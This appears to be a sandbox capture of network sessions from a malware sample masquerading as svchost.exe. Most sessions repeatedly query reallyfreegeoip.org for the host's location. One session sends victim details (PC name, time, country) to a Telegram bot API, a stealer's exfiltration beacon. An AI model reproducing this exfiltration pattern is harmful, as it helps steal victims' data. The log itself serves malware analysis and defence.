2025-01-10 14:33:47 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49712 | Destination IP: 104.21.32.14 | Destination Port: 443 | PID: 2684 | Process: C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:33:48 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 14:33:48 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:48 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1834417
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2c6e5OE5fLuHl6DIkraOL%2FsgeZ85hbtgw2JTGzN6mAur329uSjjB4NJl34WdHk06TqOyn2yxFtL5X%2FfJho6bdbpioOW7SbGqw%2B7YmEq%2FXjgmFUfRGvRT%2Fw5tHycpSUIDMtsz1a4z"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd625d0b411875-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1643&min_rtt=1638&rtt_var=625&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1736028&cwnd=153&unsent_bytes=0&cid=a34af9678bc51130&ts=143&x=0"
2025-01-10 14:33:48 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49714 | Destination IP: 104.21.32.14 | Destination Port: 443 | PID: 2684 | Process: C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:33:49 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 14:33:49 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:49 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1834418
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eXGkVCk1qhm001J5Nz%2BH99mdzKkBqjArBIuJ4JNi%2B5wLSc0cii7zYBcRmHWt8H8HZR6IunjCbedMQWtsNUP0vsW3WdBvfnxQsRGz73p%2FG9KUmkZgi84chn%2B0Rrh6WZDCBVA9%2BLQv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd62656c62c327-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1665&rtt_var=660&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1753753&cwnd=189&unsent_bytes=0&cid=7070277220c85d7c&ts=154&x=0"
2025-01-10 14:33:49 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49716 | 104.21.32.1 | 443 | 2684 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:33:50 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 14:33:51 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:50 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1834420
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wKak%2BDXJ4LdKZ8ctKObMhJQA%2Bz48I%2BfV647oT8P3oudC%2Bb62GrUHgvK0FePLKdwkZvt%2BlBUFepbaAvwRTeP3AfZhegSkFaqZYlxOqVBWSL0kZGMusu8if6PNsYrQXaC6h4EKqpk6"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd626d8cc472b9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1743&rtt_var=689&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1547429&cwnd=217&unsent_bytes=0&cid=c9ba003d52955a9b&ts=153&x=0"
2025-01-10 14:33:51 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49718 | 104.21.32.1 | 443 | 2684 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:33:52 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 14:33:52 UTC | 861 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:52 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1834421
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wBJ%2FGyIfLFkuxvf3r6Ry0WjBXMZ1Inh1x4ARGFxXKpIETczBbNQT6o7HlI0xPgjZ%2FIzre6fuYeqp70oRo0BbT4vkT86VwcF%2BkEC2pJepebTWu%2Ff66o0%2FRLdx8u2lfSStygV88%2FMN"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd6275b9bf41a6-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1540&rtt_var=604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1770770&cwnd=241&unsent_bytes=0&cid=4805a2559d6128d5&ts=155&x=0"
2025-01-10 14:33:52 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49721 | 104.21.32.1 | 443 | 2684 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:33:53 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 14:33:53 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:53 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1834422
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bwbI9CAApTwqVgoSVTyrUlI3zbli%2FqxKJMZUqfYELiIC%2FyXvGI7TGmY8p6cUlw6yila6G0vji9ObBHmUZSllvdGm4eDVPeafzQGpJ9UlFMrhZpZ18QGYbbHqBI7YA%2FDg2h%2FEY49w"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd627e0c6441a6-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1674&min_rtt=1671&rtt_var=633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1721698&cwnd=241&unsent_bytes=0&cid=a9da8ce28c7df97a&ts=166&x=0"
2025-01-10 14:33:53 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49722 | 149.154.167.220 | 443 | 2684 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:33:54 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:18:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2025-01-10 14:33:54 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 14:33:54 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 14:33:54 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49725 | 104.21.32.1 | 443 | 6572 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:33:55 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 14:33:55 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:55 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1834424
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K7N5LqwUfpVW%2F8uo4j1qTFRW6eq7lrx35ddikk6D8prK%2FbBT9RTfyenddskkVXhw16J48IEQSRq%2Bhb5SdeqnxgiUScTbLH03PW31o%2B6hqivvTT0ddVC%2FWM4UpgK0uaKvM3NDE1iO"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd6288f9b6c327-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1676&rtt_var=632&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1726788&cwnd=189&unsent_bytes=0&cid=b4d2e6dd6dd0b0da&ts=166&x=0"
2025-01-10 14:33:55 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49732 | 104.21.32.1 | 443 | 6572 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:33:56 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 14:33:56 UTC | 851 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:56 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1834425
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ph8PDkKjZvgalwuzpZHlUSL8yeECUXq%2BV5N0RzDX5QXcd7cYg6CqtT4VRJyA3ufFH7FVQuhUtuNERliwj13LLBFBQDzA7Xob2vaVlIDhkYf6ua8H5NZyfdFpEj6LmsALDB9Ae3g1"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd628e3e33c327-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1542&rtt_var=583&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1870595&cwnd=189&unsent_bytes=0&cid=9dbe1537c092f5d9&ts=135&x=0"
2025-01-10 14:33:56 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49744 | 104.21.32.1 | 443 | 6572 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:33:57 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 14:33:57 UTC | 851 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:57 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1834426
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7TotfegEDKs7inNwa9MVmUEjrhSGvEV8xgRxkrzOXq5WyUiaqbfwZK9EmlKieg0EUiI7FU8uxRI5zjaUa1mD6HXRha8x2jd3TgArFzdL5wL0CsJT%2BCMWUcpvkoxqZVT8ZgQjD4G8"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd6296ace71875-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1770&min_rtt=1703&rtt_var=686&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1714621&cwnd=153&unsent_bytes=0&cid=217ac745d356f07b&ts=157&x=0"
2025-01-10 14:33:57 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49753 | 104.21.32.1 | 443 | 6572 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:33:58 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 14:33:58 UTC | 861 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 14:33:58 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1834427
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7iDLQmpb5htsOV%2F9LxVMwWuUum0vOKUjoi2obrIBI%2FPT2uxkEeOq%2Bbz%2BzFDWnpWjcRled0D%2FP5VkK2smE5TMzW%2FCH3ndGCE34iOXsuOGFwGxnZrY0o3uCVxECgD308LgR9hHrLwd"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffd629eacfb8cda-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1789&rtt_var=683&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1586956&cwnd=243&unsent_bytes=0&cid=c946d3423c6d9297&ts=141&x=0"
